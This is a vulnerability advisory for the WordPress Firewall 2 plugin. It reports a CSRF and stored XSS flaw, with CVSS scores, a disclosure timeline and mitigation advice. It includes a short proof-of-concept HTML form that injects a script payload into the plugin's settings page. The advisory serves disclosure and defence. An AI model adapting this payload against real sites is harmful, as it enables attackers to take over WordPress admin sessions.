CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can


Last revised:

HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.

Current state: Identified

CVSS Summary

CVSS base scores for this vulnerability
Score 5.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Visit the following page, click on the submit button, then visit the plugin’s options page:

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
  <input type="text" name="email_address" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="set_email" value="Set Email">
  <input type="submit">

In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.

Advisory timeline

  • 2016-12-23: Discovered
  • 2017-03-16:┬áReported to vendor by email
  • 2017-04-04: Vendor could not be contacted

Mitigation/further actions

Disable the plugin until a new version is released that fixes this bug.